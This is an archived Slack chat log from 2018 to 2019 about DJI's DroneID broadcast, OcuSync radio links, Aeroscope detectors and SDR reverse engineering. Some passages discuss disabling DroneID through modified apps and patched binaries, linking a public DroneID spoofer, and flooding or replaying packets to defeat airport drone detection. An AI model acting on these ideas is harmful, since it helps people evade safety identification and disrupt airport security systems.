[2018-08-02 16:27:46]
aciid :
one that should work
[2018-08-02 16:27:48]
aciid :
and many more
[2018-08-02 16:27:48]
validat0r :
is it a mavic?
[2018-08-02 16:27:54]
aciid :
yes
[2018-08-02 16:28:21]
validat0r :
dont know how the occusync stuff plays into that
[2018-08-02 16:30:10]
validat0r :
do you have a screenshot of the other screen where you can see which channels the card listens to?
[2018-08-02 16:30:57]
validat0r :
there are many W5 channels in the log with "unable to set frequency"
[2018-08-02 16:31:15]
validat0r :
i wonder which chans are left over
[2018-08-02 16:32:31]
hostile :
you will NOT pick up occusync with a 2.4ghz wifi radio...
[2018-08-02 16:32:48]
hostile :
ONLY works with Mavic Air and Spark
[2018-08-02 16:32:55]
hostile :
cuz they use Wifi Chips...
[2018-08-02 16:32:57]
validat0r :
occu is 5GHz only?
[2018-08-02 16:33:03]
hostile :
its a different radio
[2018-08-02 16:33:10]
hostile :
completely unrelated to wifi chipset
[2018-08-02 16:33:28]
hostile :
a) the SDR code is not public and anyone that has it knows that, certainly would not share it for free
[2018-08-02 16:33:47]
hostile :
b) there is no public Occusync protocol **anything** including droneid
[2018-08-02 16:33:53]
validat0r :
so this method doesnt work with mavic anyway?
[2018-08-02 16:34:03]
hostile :
not unless it is a mavic air
[2018-08-02 16:34:10]
hostile :
or a mavic set to wifi mode connected to phone
[2018-08-02 16:34:24]
validat0r :
ok. maybe someone should have mentioned that to aciid :-D
[2018-08-02 16:34:24]
hostile :
kismet is explicitly a wifi tool...
[2018-08-02 16:34:29]
aciid :
Hah
[2018-08-02 16:34:34]
hostile :
it is inherent in understanding the chipsets, etc
[2018-08-02 16:34:49]
hostile :
Occusync is NOT wifi
[2018-08-02 16:35:02]
hostile :
there is 100% no way in fuck you are going to see occusync traffic with your normal wifi stack
[2018-08-02 16:35:03]
hostile :
period
[2018-08-02 16:35:05]
validat0r :
I was under the impression that droneid packets were still receivable with standard W5 wifi
[2018-08-02 16:35:09]
hostile :
no
[2018-08-02 16:35:21]
hostile :
Mavic Air and Spark use 5mhz wifi...
[2018-08-02 16:35:42]
hostile :
and as such we can tune to it and see it and decode the drone id with in
[2018-08-02 16:36:04]
hostile :
drone id ONLY transmits on the interface you use for c2
[2018-08-02 16:36:24]
validat0r :
c2?
[2018-08-02 16:36:25]
hostile :
its not just gonna start tossing out 5mhz wifi packets when there isn't even wifi hardware or connectivity present.
[2018-08-02 16:36:29]
hostile :
"command & control"
[2018-08-02 16:37:14]
validat0r :
well, aciid .. you have a spark or an air laying around?
[2018-08-02 16:38:25]
aciid :
Well no, but i found something interesting. When i turned on droneid manually, my phone appeared on the list as an individual mac address. Not as a client to my home wifi
[2018-08-02 16:38:56]
validat0r :
how do you turn on droneid manually?
[2018-08-02 16:39:18]
aciid :
Ill show you a screenshot
[2018-08-02 16:39:50]
hostile :
most phones beacon wifi constantly...
[2018-08-02 16:39:59]
hostile :
this is not surprising
[2018-08-02 16:40:26]
validat0r :
yeah, probably a coincidence you saw it appearing right in that moment
[2018-08-02 16:41:39]
validat0r :
so it's sdr-time for you, aciid ..
[2018-08-02 16:42:41]
aciid :
Well luckily i have ton of shit equipment to play with
[2018-08-02 16:44:38]
validat0r :
how far are the efforts to decode occusync publicly?
[2018-08-02 16:48:20]
hostile :
none
[2018-08-02 16:48:23]
hostile :
it is too valuable
[2018-08-02 16:48:26]
hostile :
doubt it will happen
[2018-08-02 16:48:42]
hostile :
anyone with the skills to do it has already been courted by counter UAS companies.
[2018-08-02 16:52:22]
validat0r :
i wonder whether the c2 over wifi and occu is tamper proof ..
[2018-08-02 16:54:36]
hostile :
heh no
[2018-08-02 16:54:58]
hostile :
keep in mind D13 MESMER has Spark and Mavic air "mitigations"
[2018-08-02 16:55:06]
hostile :
also Lightbridge...
[2018-08-02 16:55:12]
hostile :
no c2 is "tamper proof"
[2018-08-02 16:55:13]
hostile :
period
[2018-08-02 16:55:34]
validat0r :
isnt it secured by wpa2?
[2018-08-02 17:06:49]
hostile :
I can't really discuss the semantics of their c2 links in the context of tampering
[2018-08-02 17:06:52]
hostile :
sorry mate
[2018-08-02 17:44:19]
aciid :
well lets talk about something happier, like, how we could approach DJI products with SDR devices
[2018-08-02 17:44:41]
aciid :
need to set up shop and all that probably because of the noise
[2018-08-02 18:20:56]
hostile :
I can't participate in that conversation, sorry! Many others can't here for the reasons mentioned above. Those with the skill either work for, or have been approached by counter UAS companies to do the same thing. Highly unlikely to see free SDR work for occusync / lightbridge in *here*
[2018-08-02 18:23:37]
aciid :
yeah I'm just interested in understanding these technologies. I know you are all careful and probably it's best to keep some things under wraps out of commercialization
[2018-08-02 18:34:30]
aciid :
well I think I'll start working on these subjects more once I finish my HAM operator license this fall, and have some more ground on the subject by then.
[2018-08-04 19:28:37]
aholtzma :
@aciid if you want to get started learning more about SDR, this is a cheap option at $99 <http://www.analog.com/en/design-center/evaluation-hardware-and-software/evaluation-boards-kits/adalm-pluto.html#eb-overview> (and hackable up to 6 GHz)
[2018-08-04 19:29:24]
aholtzma :
this will let you capture some traffic and then you can pull it apart offline using python
[2018-08-04 19:32:06]
aholtzma :
though it is an immense undertaking to blind RE a wireless protocol even if you are an expert
[2018-08-04 19:32:17]
aholtzma :
a good learning experience though
[2018-08-04 19:33:15]
aholtzma :
luckily none of this stuff is completely bespoke, they reused bits and pieces from various standards
[2018-08-04 21:04:06]
aciid :
Interesting, is the FPGA board separate from the main MCU? That would increase field usage if apps could be programmed into that.
I have a hackrf, but it's hard to use in the field since the apps need to be coded in firmware or use a laptop. Not a problem tho since i usually study at home on the workbench
[2018-08-05 10:45:25]
mathieu.peyrega :
ath9k installed and working! now with this and hackRF I think I have the basic toolbox to start looking into those RF things
[2018-08-05 10:47:56]
aciid :
welcome to the hidden world
[2018-08-05 14:58:25]
validat0r :
Hmm .. Nothing at 5ghz?
[2018-08-05 14:58:52]
validat0r :
Whats The 1.5 GHz peak?
[2018-08-05 14:59:36]
validat0r :
Cellular network?
[2018-08-05 15:22:53]
mathieu.peyrega :
You see a spike around 1.5GHz ?
[2018-08-05 15:24:16]
mathieu.peyrega :
If around 1.575 could be some leaks from the GPS active antenna
[2018-08-05 15:31:22]
validat0r :
is this gone when AC/RC are off?
[2018-08-05 15:33:44]
validat0r :
right at 1.5GHz I see wireless microphones at 50mW max.
[2018-08-05 15:34:41]
validat0r :
and some military stuff
[2018-08-05 15:35:52]
validat0r :
when looking at german regulatory information.
[2018-08-05 15:51:54]
validat0r :
whats that supposed to mean?
[2018-08-05 15:56:39]
aciid :
probably conforming to standards to use channel widths that are specified on that band
[2018-08-06 16:51:10]
aciid :
reflection from the next door apartment's 4G repeater
[2018-08-09 16:49:09]
hostile :
is this guy serious? <https://twitter.com/dronelaws/status/1027186683601723392>
[2018-08-09 16:49:20]
hostile :
<https://twitter.com/DJIGlobal/status/1027335345359052800>
[2018-08-09 16:49:22]
hostile :
what a joke!
[2018-08-09 17:02:34]
mathieu.peyrega :
lol, most weapon manufacturers sell the weapon and the anti-weapon... (like air to ground missiles) and ground defense systems...
[2018-08-09 17:02:48]
mathieu.peyrega :
do gun manufacturers also sell bulletproof jackets?
[2018-08-09 17:04:02]
mathieu.peyrega :
I love how the media seems to discover that UAVs are threats...
[2018-08-09 17:05:00]
mathieu.peyrega :
while it was only in Syria / Iraq they did not seem too concerned, but now that it "looks" plausible to get something like that happening at home they are writing about it (and interviewing the wrong people...)
[2018-08-09 18:02:35]
aciid :
DJI falseflag 2018 :smile:
[2018-08-09 20:21:56]
wesleymiller :
It seems like reports only come out in the media on the front page when they are seeking to change public opinion to forward an agenda... or if it's too big to ignore. Otherwise it's buried 10 pages in.
[2018-08-12 12:46:10]
eseven :
Droneid is only applied at spark, mavic, phantom and inspire? or whole dji catalog?
[2018-08-12 12:51:36]
hostile :
whole catalog
[2018-08-12 12:51:43]
hostile :
only works on wifi for spark and mavic air
[2018-08-12 12:51:59]
hostile :
specifically on a special 5mhz channel spacing (not 5ghz I said 5mhz)
[2018-08-12 12:52:15]
hostile :
older birds pre p4 do not have droneid
[2018-08-13 05:40:30]
eseven :
With no wifi, is droneid inside occusync packets or does it send a beacon-like packet?
[2018-08-13 05:47:07]
eseven :
Lightbridge, occusync hardware have mac addresses, it would mean that DJI is implementing some kind of IP stack (there are also non IP stacks using MAC), with broadcast/multicast features. Could it be 802.11p? Using OCB? Modded kernel region params? :thinking_face:
[2018-08-13 13:15:13]
hostile :
they are sent using occusync hardware, but sent out of band to normal data streams
[2018-08-27 13:05:29]
eseven :
ok. But you might know that this out of band can be managed by the correct ath9k Patch. A good solution to not use a SDR
[2018-08-27 13:18:54]
hostile :
there is no "patch" for 5mhz ... this is a hardware thing @miliu00's 5ghz frequency patch has nothing to do with 5mhz channel spacing at hardware level.
[2018-08-27 13:28:59]
eseven :
I'm talking about using "non standard" channel frequencies, not bandwidths and spacings..
[2018-08-27 13:32:12]
eseven :
I suggest using it to dump ocusync packets, not adhoc ones
[2018-08-27 14:39:48]
kilrah :
then you're not getting the droneid packets...
[2018-08-27 14:43:35]
hostile :
@miliu00 there is currently no occusync demodulator that is public. If you have gnuradio code, I'd be keen to see you catching out of band lightbridge, or occusync drone id packets. I'm aware of no one with anything public, short of making pretty spectrum graphs and saying "I see it!". There are neither public Occusync, or Lightbridge demodulators, nor drone ID demodulators for either protocol. ONLY code public for droneID now is the Kismet code for the Adhoc wifi.
[2018-08-27 14:43:54]
hostile :
packets are out of band on the c2 link as they can not be encrypted
[2018-08-27 14:44:02]
hostile :
or AeroScope would not be able to see them.
[2018-08-29 09:31:15]
eseven :
Are you sure that the lightbridge/ocusync 10mhz ofdm downstream is the C2 link? It used to be on the upstream (RC - RPAS) with FHSS on it. Downstream is "ip stacked" broadcast and on a single channel..
[2018-08-29 09:32:39]
eseven :
Maybe we might open a lightbridge/ocusync thread :thinking_face:
[2018-09-05 08:33:00]
pnndra :
good morning. i am trying to reverse the protocol between Aeroscope and DJI Assistant. i am already able to get positions and a lot of other data but there are a few things i'm missing. is this the right place to discuss this?
[2018-09-05 08:35:55]
validat0r :
technically, yes. but i've never seen anybody looking at this in here.
[2018-09-05 08:36:36]
pnndra :
ok. i think it's very similar to what is actually being used in other topics such as log files
[2018-09-05 08:37:17]
pnndra :
i see that some data corresponds for example to the data structure of log files inside the drone
[2018-09-05 12:18:30]
santiago.gadget :
Ok - do you receive the data just internally ?
[2018-09-05 12:18:49]
santiago.gadget :
Or do you actually have a RF receiver to really receive the data from the air ?
[2018-09-05 12:18:53]
santiago.gadget :
This is quite interesting..
[2018-09-05 12:57:44]
hostile :
it is broadcast over multicast on the same LAN if you are connected to its LAN port
[2018-09-05 15:32:55]
santiago.gadget :
ok - which lan port ? - the wifi from the copter itself ? - or are you talking about a wifi version ?
[2018-09-05 15:33:29]
santiago.gadget :
normally this is via OFDM, no ?
[2018-09-05 15:36:41]
hostile :
"protocol between Aeroscope and DJI Assistant."
[2018-09-05 15:36:54]
hostile :
I am speaking to @pnndra
[2018-09-05 15:37:18]
hostile :
the data on lan is based on what was captured over RF
[2018-09-05 19:20:20]
pnndra :
@hostile yes i know. i already extracted almost everything but have some doubts on packet format
[2018-09-05 19:20:32]
pnndra :
as i see that different drones have packets with different lengths
[2018-09-05 19:21:15]
pnndra :
and am wondering how it is structured as i see there are some bitfields in protocols handled elsewhere that seem to enable/disable records
[2018-09-05 19:29:43]
hostile :
you should study what was done in Kismet
[2018-09-07 18:04:41]
kyokushin :
!apk
[2018-09-14 19:46:34]
hostile :
@bryanhalf
[2018-09-14 19:46:37]
bryanhalf :
@bryanhalf has joined the channel
[2018-09-14 19:47:15]
hostile :
I forget <!here> didn't one of you in @channel patch a dji_ binary to stop transmitting droneid? hdvt binary perhaps? someone here put this puzzle back together for me. =]
[2018-09-14 20:13:30]
pingspike :
That needs building in to deejayeye-modder :+1::skin-tone-2:
[2018-09-14 20:18:27]
jcase :
uh
[2018-09-14 20:18:35]
jcase :
deejayeye-modder mods the app
[2018-09-14 20:18:37]
jcase :
not the drone
[2018-09-15 14:31:59]
pingspike :
oh yeah, good point... :blush:
[2018-09-15 17:26:17]
christianwoodward :
@hostile I remember that too
[2018-09-15 17:26:30]
christianwoodward :
youre not crazy (yet)
[2018-09-15 17:26:50]
christianwoodward :
maybe it was in hardware?
[2018-10-12 14:39:05]
rcflyer40t :
Any updates to working around broadcasting our information to aeroscope?
[2018-10-12 14:40:09]
cantrepeat :
The NLD GO app stops it.
[2018-10-12 14:40:42]
rcflyer40t :
Ah, so run that app vs dji app. That I can do.
[2018-10-12 14:41:09]
rcflyer40t :
Thanks @catalinaskirace
[2018-10-12 15:12:51]
cantrepeat :
You can run the NLD and the DJI app side by side but the DJI app will still send your data. So, if you want to go offline completely only run the NLD app.
[2018-10-12 15:16:37]
kilrah :
that's what he was saying
[2018-10-12 15:55:41]
rcflyer40t :
I got that... But thanks for the clarification... Here's a question, aeroscope can read your drone's serial as well. Is that taken from the remote side, or from the drone side?
[2018-10-12 16:00:44]
good.win.alexs :
@catalinaskirace So, DroneId is controlled over Go? Is it true?
[2018-10-12 16:15:14]
cantrepeat :
That is what I have read
[2018-10-12 16:18:57]
cantrepeat :
I don't recall, but I read it in either, a blog, on the website or might even be text in the apk patcher process.
[2018-10-12 16:27:37]
cantrepeat :
Im pretty sure we talked about it on slack at least a few times
[2018-10-12 16:29:09]
cantrepeat :
iirc NLD stops the communication between the drone and the RC that aeroscope uses to ID the bird and account connected to it.
[2018-10-12 17:56:08]
hostile :
@rcflyer40t you should read this... <https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf>
[2018-10-12 18:26:13]
rcflyer40t :
Thanks everyone for the info so far. @hostile thank you for the lunch time reading. Glad to see it's not being broadcasted. Should be left up to us, but considering the way the government works, it's always do first, ask for permission after the civilians start the witch hunt.
[2018-10-12 18:27:13]
cantrepeat :
@hostile am I remembering it correctly?
[2018-10-12 18:35:46]
hostile :
there are a few ways to accomplish things. i don't recall which nasty trick @coldflake implemented.
[2018-10-21 03:02:15]
rcflyer40t :
"iirc NLD stops the communication between the drone and the RC that aeroscope uses to ID the bird and account connected to it."
What about if I want to use an iPad app and not an Android? NLD doesn't have an iPad version like that, which doesn't transmit the pilot data. Or is there one?
[2018-10-21 08:31:33]
kilrah :
nope
[2018-10-21 17:45:32]
rcflyer40t :
Bahhh that sucks
[2018-10-21 18:23:13]
hostile :
you need to stop in ~ios_ipa_reversing and put in some Frida work =]
[2018-12-28 16:07:47]
fallengod :
<https://dronelife.com/2018/12/27/u-k-airports-are-testing-drone-detection-technology-now-heres-how-many-drones-theyve-found/>
[2018-12-28 16:08:35]
fallengod :
Let's do our best to make a system like this totally useless
[2018-12-28 17:42:05]
hostile :
best of luck!
[2018-12-28 17:42:16]
hostile :
you'll need a signature generation engine
[2018-12-28 17:42:29]
hostile :
currently only available for DJI products on DroneID over wifi.
[2018-12-28 18:19:13]
fallengod :
Would we not flood the airwaves with captured dji packets?
[2018-12-28 18:21:20]
validat0r :
I hope airports dont rely on aeroscope only .. should be an effective low-cost DoS
[2018-12-28 18:22:57]
hostile :
@fallengod replayed DJI packets would only be so effective... depends on how the system does detection I guess, and how intelligent its logic is. (if it dissects telemetry data, etc)
[2018-12-28 18:23:22]
hostile :
most systems likely not very robust... but in order to visualize the real impact, you'd need some insider access
[2018-12-28 18:26:52]
fredmicrowave :
Is it safe to rely that much on passive detection when drones could be silent ?
[2018-12-28 18:29:43]
hostile :
yeah most CUAS platforms are not mature
[2018-12-28 18:29:50]
hostile :
require cooperative sensor work
[2018-12-28 18:29:53]
hostile :
not JUST RF,
[2018-12-28 21:04:40]
fallengod :
Or just have 100 drones in a truck with 100 radios powered on and watch the airport shutdowns and the news call out a drone swarm
[2018-12-28 21:23:22]
hostile :
guess it depends on how bad you want to get vanned
[2018-12-28 21:23:33]
hostile :
I recommend the balloon + throwie route personally
[2018-12-28 21:47:28]
bobdole :
why would i care if someone knew i was flying a hubsan instead of a parrot?
[2018-12-28 21:48:23]
bobdole :
seems like they're just trying to grab a piece of dji's aeroscope market share by showing other drones out there
[2018-12-28 21:52:24]
hostile :
why would you care? I don't know @jacksphone tell me about your assets... "grab a piece of dji's aeroscope market", that is one of the stupidest things I've heard in a while. Aeroscope is contrived simply so DJI can sell more of its own products while hand waving about threats. It is NOT a player in the CUAS market. It can't mitigate, and can only detect its own products.
[2018-12-28 21:53:05]
bobdole :
why so hostile? lol
[2018-12-28 21:53:10]
bobdole :
it was a serious question
[2018-12-28 21:53:27]
hostile :
so was my "tell me about your assets" question.
[2018-12-28 21:53:57]
hostile :
what is your current threat model? **which** hubsan? **which** parrot?
[2018-12-28 21:54:01]
bobdole :
dedrone is soemthing to worry about?
[2018-12-28 21:54:03]
hostile :
lots goes into that question and answer =]
[2018-12-28 21:54:43]
hostile :
define "worry", and in what context?
[2018-12-28 21:57:31]
bobdole :
ok... my concern is i don't want my drone's serial number or my personal info broadcast for anyone to pick up. i simply don't like aeroscope because dji is trying to give out my personal info... it looks like dedrone can find out what you are flying and how to take it down. i don't intend to attack military bases or disrupt airports (hopefully ever), so i'm not worried about someone trying to take my drone down. as far as i'm concerned it is way too easy to take out a drone
[2018-12-28 21:58:35]
bobdole :
im also assuming that airports want to identify drone pilots for the public trial
[2018-12-28 21:58:41]
hostile :
I've discussed your concerns in a whitepaper I wrote fwiw. <https://department13.com/dev/wp-content/uploads/2018/02/Anatomy-of-DJI-Drone-ID-Implementation1.pdf>
[2018-12-28 21:59:05]
hostile :
it is assumed that you know I work for a counter drone company, **not** dedrone
[2018-12-28 21:59:26]
bobdole :
no. i honestly am pretty ignorant and often come across as offensive
[2018-12-28 21:59:34]
bobdole :
maybe its my handle?
[2018-12-28 21:59:54]
hostile :
haha no I often come off as offensive too... hence my name :wink:
[2018-12-28 21:59:56]
hostile :
no stress here.
[2018-12-28 22:00:15]
hostile :
having a threat model discussion is prudent to say the least
[2018-12-28 22:00:53]
bobdole :
so i shouldn't have grouped dji and dedrone in the same sentence i'm guessing?
[2018-12-28 22:01:03]
hostile :
here is an example... of what I did for a risk assessment at the largest airport here in the US traffic wise. <https://prezi.com/view/hIqARQObz3gLwHhJN6tE>
[2018-12-28 22:01:26]
hostile :
DJI's product is a ruse... literally to help them continue sales here in the US via a handwave.
[2018-12-28 22:01:32]
hostile :
it is a joke of a CUAS product
[2018-12-28 22:02:38]
bobdole :
ah... i see how ridiculous my comment was about their market share
[2018-12-28 22:02:53]
hostile :
Dedrone was here before them =]
[2018-12-28 22:03:10]
hostile :
Aeroscope IMHO is a reactionary product not actually intended to detect drones
[2018-12-28 22:03:23]
hostile :
(else it would have more plugins for NON dji drones)
[2018-12-28 22:03:59]
bobdole :
well any awareness you have on the target (as well as number of targets) is a godsend compared to "flying in the dark" as aeroscope would have left an airport that was dealing with hacked dji drones
[2018-12-28 22:03:59]
hostile :
also the whole broadcast system... was unnecessary. We (at department13) have been using characteristics in DJI's protocol for years now to detect **specific** drones sans the need to tie serial number, etc in.
[2018-12-28 22:04:29]
bobdole :
mesmer
[2018-12-28 22:04:34]
hostile :
aye
[2018-12-28 22:05:04]
hostile :
mesmer had DJI detection capability and ID functionality way before Aeroscope lol
[2018-12-28 22:05:14]
hostile :
DJI is kinda goofy like that
[2018-12-28 22:05:28]
hostile :
lets **invent** something that doesnt need to be invented, and then lobby to high hell for it
[2018-12-28 22:06:16]
bobdole :
i'm really curious about mesmer and i'm sure i won't get any answers about how it works... but is mesmer something that a civilian can acquire?
[2018-12-28 22:06:29]
hostile :
no it is heavily controlled
[2018-12-28 22:06:32]
hostile :
buyers vetted
[2018-12-28 22:07:01]
bobdole :
i heard an oligarch on a yacht was using CUAS on some youtuber
[2018-12-28 22:07:03]
hostile :
I've given lots of hints about it in my public talks
[2018-12-28 22:07:20]
hostile :
said oligarch was not using MESMER to my knowledge lol
[2018-12-28 22:07:26]
hostile :
but yes I heard of this too
[2018-12-28 22:07:32]
hostile :
probably just had a nice chinese jammer
[2018-12-28 22:08:21]
bobdole :
assuming china has bugs everywhere and probably has a clone of mesmer by now... what might i have to worry about from an oligarch on a yacht if i were to take a closer look at his party?
[2018-12-28 22:08:53]
bobdole :
compass error and flyaway?
[2018-12-28 22:09:14]
hostile :
we pitch controlled take overs
[2018-12-28 22:09:23]
hostile :
we have working emulation of specific bits of DJI control protocol
[2018-12-28 22:09:26]
bobdole :
oh thats right i forgot about that
[2018-12-28 22:09:30]
hostile :
we tell it where to land
[2018-12-28 22:09:41]
hostile :
but that is about all I can discuss, as has already been publically disclosed
[2018-12-28 22:09:51]
bobdole :
can any chinese product do that?
[2018-12-28 22:09:56]
hostile :
who knows
[2018-12-28 22:10:10]
hostile :
I know the Bard CUAS list only shows 6 products listed as "protocol manipulation" capable, MESMER being one of said 6.
[2018-12-28 22:10:19]
hostile :
and even fewer have **demonstrated** said capability
[2018-12-28 22:10:38]
hostile :
<https://dronecenter.bard.edu/files/2018/02/CSD-Counter-Drone-Systems-Report.pdf>
[2018-12-28 22:11:04]
bobdole :
this is all great reading thank you
[2018-12-28 22:11:32]
hostile :
dinner time for me.
[2018-12-28 22:11:34]
hostile :
**salute**
[2018-12-28 22:11:45]
bobdole :
:+1:
[2018-12-29 17:37:23]
sheldon.holy :
I've played with portable aeroscope, it's handy for DJI drones but as above it suck for non DJI products
[2018-12-29 17:37:41]
sheldon.holy :
It is cheap though
[2018-12-29 17:54:43]
irischnpak :
Why are Rohde & Schwarz not mentioned? And also their method of tracking the drone, predicting the impact point and interfering with I2C communication via RF?
[2018-12-29 22:01:52]
jcase :
cheap?
[2018-12-29 22:01:56]
jcase :
portable aeroscope isnt cheap
[2018-12-30 00:27:23]
sheldon.holy :
Cheap compared to other drone detection systems
[2019-01-17 23:16:23]
eitan1195 :
obviously aeroscope detects all dji drones, wondering however if anything other than aeroscope (mesmer for instance) detects ocusync? if so - why is aeroscope so widely spread across airports.
[2019-01-17 23:18:19]
jcase :
yes other things do
[2019-01-17 23:18:26]
jcase :
because aeroscope is cheaper than other solutions
[2019-01-17 23:18:27]
jcase :
that do
[2019-01-17 23:18:54]
eitan1195 :
what other product detects ocusync? sounds interesting :slightly_smiling_face:
[2019-01-17 23:19:21]
eitan1195 :
i do wonder how airports are willing to rely on aeroscope - a chinese owned company
[2019-01-17 23:19:23]
eitan1195 :
strange
[2019-01-17 23:23:47]
jcase :
several companies have products, check out D3 i think they can now
[2019-01-17 23:23:50]
jcase :
d13
[2019-01-17 23:24:44]
eitan1195 :
d13's mesmer? can it actually get flight info (serial, telemetry) or just detect a generic ocusync? sounds cool anyways
[2019-01-17 23:27:13]
jcase :
i dont know
[2019-01-17 23:27:17]
jcase :
i dont work for them
[2019-01-17 23:28:25]
eitan1195 :
fair enough. as for the aeroscope - how expensive is it?
[2019-01-17 23:28:44]
jcase :
under 10k for the cheap one
[2019-01-17 23:30:39]
eitan1195 :
and it can't actually mitigate, simply fetch the detection info? if so - it is insufficient for airports i imagine
[2019-01-17 23:58:38]
christianwoodward :
there is a company that makes a mitigation device, I’d have to dig it up but it lands the copter and supports many manufacturers - granted I’m sure they dont work on custom builds or modded builds, but its still enough to sell
[2019-01-17 23:59:36]
christianwoodward :
they claimed to have “broken”/reversed many com channels and prob just overload the signal from the real remote - I do remember it didnt rely on GPS hacking
[2019-01-18 00:02:31]
christianwoodward :
I cant find the exact thing, it may be one of these: <https://www.droneshield.com/> <https://www.dronedefence.co.uk/products/skyfence/>
[2019-01-18 00:07:37]
eitan1195 :
super interesting, i'll have a look. generally interested in solutions that actually fetch information out of ocusync (telemetry etc..) :slightly_smiling_face:
[2019-01-18 01:16:55]
hostile :
@eitan1195 if you are looking for D13 mesmer info... ask for Matt Harvil, tell em Kevin sent ya.
[2019-01-21 02:15:27]
huge1_10 :
Hey has anyone seen the fakefake XXXX ID some AeroScope Detectors are pushing out on the screen?
[2019-01-21 02:17:00]
huge1_10 :
For instance this Drone ID is appearing fakefake005005029 and then fakefake02005029
[2019-01-21 02:17:42]
huge1_10 :
The above are directly after a P4P is detected
[2019-01-21 04:06:44]
hostile :
I wrote a droneID spoofer...
[2019-01-21 04:06:50]
hostile :
for Aeroscope....
[2019-01-21 04:07:07]
hostile :
@huge1_10 you can write what ever you want on an AeroScope
[2019-01-21 04:07:53]
huge1_10 :
So you can replace the Quadcopter Serial with any value you like?
[2019-01-21 04:08:15]
hostile :
I don't even have to operate one in the first place. I can just mimic the packets.
[2019-01-21 04:08:53]
huge1_10 :
Ok got it....
[2019-01-21 04:08:54]
hostile :
<https://github.com/DJISDKUser/metasploit-framework/commit/4682525f176861d1cb68bf006ff0afe0a3ab5617>
[2019-01-21 04:08:57]
hostile :
this is the public version
[2019-01-21 04:10:16]
huge1_10 :
Ok, got it, many thanks for that.
[2019-01-21 10:02:46]
validat0r :
@huge1_10 recently bought one and suddenly realized how shitty it is?
[2019-01-21 15:16:34]
fredmicrowave :
sernum = "DroneID is crap!" :rolling_on_the_floor_laughing::+1:
[2019-01-21 15:23:53]
hostile :
you should have seen the video I made of it falling over
[2019-01-21 15:30:28]
hostile :
Gonna publish it for you now... hold on a few minutes
[2019-01-21 15:31:28]
hostile :
<https://youtu.be/EdRvaTlKJIA>
[2019-01-21 15:46:55]
fredmicrowave :
:joy: That´s awesome!
Thanks!
[2019-01-21 16:02:15]
fredmicrowave :
And you even did it over there....
[2019-01-21 16:18:32]
good.win.alexs :
Do I understand correct - no wifi module = no problem? :smile:
[2019-01-21 16:18:37]
good.win.alexs :
on M1P
[2019-01-21 16:34:43]
hostile :
no you do not understand correct. Occusync modules also transmit droneid out of band
[2019-01-21 17:22:32]
cantrepeat :
lol you should set 3 fake drones with names, it's a bird, no it's a plane, no it's Superman!!!
[2019-01-21 19:15:07]
jcase :
@huge1_10 that means someone set the privacy bits
[2019-01-21 19:15:15]
jcase :
That isn't a spoof
[2019-01-21 20:31:22]
eitan1195 :
cool video of the spoofing @hostile, does aeroscope indicate if the drone detected is wifi or rc (i could not tell from the quality of the video :neutral_face: )
[2019-01-30 02:55:03]
bobdole :
bill gates brings echodyne anti drone radar?? what does this system offer over the rest ? <https://gizmodo.com/this-startup-backed-by-bill-gates-and-dhs-is-gunning-to-1832157587>
[2019-01-30 04:35:03]
czokie :
Anyone going to send out a device to spoof? Might be fun to see the reaction?
[2019-01-30 04:35:39]
czokie :
I was actually going to ask if you were specifically going to do it @hostile - but that would be too obvious
[2019-01-30 04:37:03]
czokie :
Hmm. I just had another funny thought. Imagine if whatever system in use was connected to the “jumbo-tron” during an alert? Now THAT would be really cool to get footage of that “image” on the screen
[2019-01-31 11:03:14]
the_lord :
@huge1_10 like this one
[2019-01-31 12:02:02]
validat0r :
Oman?
[2019-01-31 13:48:28]
the_lord :
This test was in Oman yes
[2019-02-02 09:49:16]
kilrah :
awesome
[2019-02-28 15:57:56]
antoine.menini :
Hello, does anyone have this problem with Mavic Pro drone ID on WiFi?
[2019-02-28 16:06:05]
antoine.menini :
(I cannot upload pictures anymore)
[2019-02-28 16:06:56]
antoine.menini :
<https://imgur.com/a/jbD0qYJ>
[2019-02-28 16:15:43]
validat0r :
worked both times .. slack just sucks
[2019-03-09 20:08:01]
kilrah :
how about you say where you see that, in what app etc.
[2019-03-09 20:46:37]
validat0r :
thats kismet wireless
[2019-03-11 10:35:33]
antoine.menini :
yes sorry, that’s the Kismet implementation of droneID
[2019-03-11 10:47:19]
eseven :
@antoine.menini did you solve the "broken firmware" message?
[2019-03-11 10:57:06]
antoine.menini :
Hello, no I didn’t
[2019-03-11 16:43:43]
antoine.menini :
It happens with my Mavic Pro (I use the stock FW from DJI)
[2019-03-11 22:02:10]
eseven :
Mavic pro firmware revisions 01.04.0100 and 01.04.0200 don't send a part of DroneID correctly, and show this message. Which firmware version do you have?
[2019-03-12 08:01:19]
antoine.menini :
I believe I have all the latest versions
[2019-03-12 08:01:38]
antoine.menini :
maybe they broke the droneID and need to do another update
[2019-03-12 21:35:12]
eseven :
Do you read droneid while the drone is flying and home is set? It only sends valid info during flight.
[2019-03-13 08:01:10]
antoine.menini :
No, the information of "broken firmware" is during the flight
[2019-03-15 11:56:38]
eseven :
Which wifi card do u use? Do you know the model? Could be some firmware lack..
[2019-03-15 12:35:31]
antoine.menini :
I use the AWUS036NHA
[2019-03-15 12:35:39]
antoine.menini :
with Atheros AR9271
[2019-03-29 19:27:39]
euvele :
Where can I get the Aeroscope SDK Package?
[2019-03-29 20:58:58]
jcase :
You have to pay for it
[2019-03-29 20:59:04]
jcase :
It's 50-75k
[2019-03-29 21:05:19]
validat0r :
for a download? :smile:
[2019-03-29 21:17:51]
lolo780 :
Not shareware?
[2019-03-29 21:20:09]
validat0r :
nice business model .. sell the drones and the counter-drone stuff
[2019-03-29 21:21:54]
lolo780 :
For sure.
[2019-03-29 21:22:07]
lolo780 :
I like two boobs
[2019-03-29 21:45:18]
jcase :
for libraries
[2019-04-08 15:25:35]
xela75 :
hey ! interesting topic !
[2019-04-08 15:27:09]
xela75 :
First of all, do we know how ocusync is ciphered ? Is it RC commands, video feed ? or both ?
[2019-04-08 15:27:49]
xela75 :
AFIK, it seems to be only for video...
[2019-04-08 15:36:19]
validat0r :
problem is receiving it in the first place, since it seems to be using a custom SDR
[2019-04-08 15:36:50]
validat0r :
plus: it's for video and rc commands both afaik
[2019-04-08 15:44:12]
xela75 :
so it's a kind of pre-shared key and not a end to end encryption mode ?
[2019-04-08 15:59:24]
validat0r :
yeah .. psk. no end to end. much like wifi adhoc mode
[2019-04-08 16:00:18]
validat0r :
i dont think communication over the ocu-channel is encrypted.
[2019-04-08 16:00:50]
validat0r :
but there are much more qualified guys here to speak about that
[2019-04-09 07:51:31]
xela75 :
ok ty
[2019-04-09 07:51:36]
xela75 :
